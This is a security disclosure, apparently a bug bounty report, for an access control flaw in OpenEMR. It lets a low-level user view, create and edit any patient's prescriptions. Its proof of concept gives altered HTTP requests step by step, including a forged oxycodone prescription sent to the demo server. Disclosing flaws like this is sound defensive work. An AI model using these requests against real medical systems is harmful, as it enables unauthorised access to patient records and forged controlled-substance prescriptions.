Description

An Access Control Vulnerability allows a low level user in the web application to view, create, and edit prescriptions for all users.

Proof of Concept

Step 1. Login to the openemr web application as a low level user (Ex: Receptionist in openemr demo)

Step 2. Travel to a page that will cause your browser to send a new request. For example, select Patient->New/Search. Capture this request using a tool such as BurpSuite.

Step 3. Now you need to modify the Path to one of the following examples:
GET /a/openemr/controller.php?prescription&edit&id=17 (Edits the prescription that corresponds with the id parameter)
POST /a/openemr/controller.php?prescription&edit&id=0&pid=1 (Creates a new prescription for the user that corresponds with the pid parameter)
GET /a/openemr/controller.php?prescription&list&id=2 (Lists the existing prescriptions for the user that corresponds with the pid parameter)

For this POC we will use POST /a/openemr/controller.php?prescription&edit&id=0&pid=1 to create a new prescription for the first user in the database. Below is an example of the altered request:

POST /a/openemr/controller.php?prescription&edit&id=0&pid=1 HTTP/1.1
Host: demo.openemr.io
Cookie: OpenEMR=(...Redacted...)
User-Agent: (...Redacted...)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://demo.openemr.io/a/openemr/interface/main/tabs/main.php?token_main=3sY8M8OnnLfIk423mJEzQPDv3CH9dHifsjryleJC
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

Step 4. This request will bring up the 'Add/Edit' page for new prescriptions. Fill out the necessary information, select the save button, and capture the request with BurpSuite. Note: ACL restrictions prevent searching for drugs on this page, the drug name can simply be added to the request by adding &drug=nameofdrug to the body of the request. Below is an example of this modified request:

POST /a/openemr/controller.php?prescription&edit&id=0&pid=1 HTTP/1.1
Host: demo.openemr.io
Cookie: OpenEMR=(...Redacted...)
User-Agent: (...Redacted...)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 244
Origin: https://demo.openemr.io
Referer: https://demo.openemr.io/a/openemr/interface/new/new.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

controlled_substance_flag=on&active=1&start_date=2023-03-13&provider_id=1&patient_id=1&rxcui_select=on&quantity=100&size=25&unit=1&dosage=1&form=2&route=0&interval=0&refills=3&per_refill=100&note=&substitute=0&id=0&process=true&rxnorm_drugcode=&drug=oxycodone

Step 5. Once you send this modified request, you will see a list of all prescriptions associated with that user, including your newly created prescription. Login to an admin account and view the patient that corresponds with the tested pid to verify that the creation was successful.

Impact

A malicious actor with access to a low level account in the Web Application could view, create, and edit prescriptions for patients. This poses a large security risk, due to the controlled and legally restricted nature of prescriptions.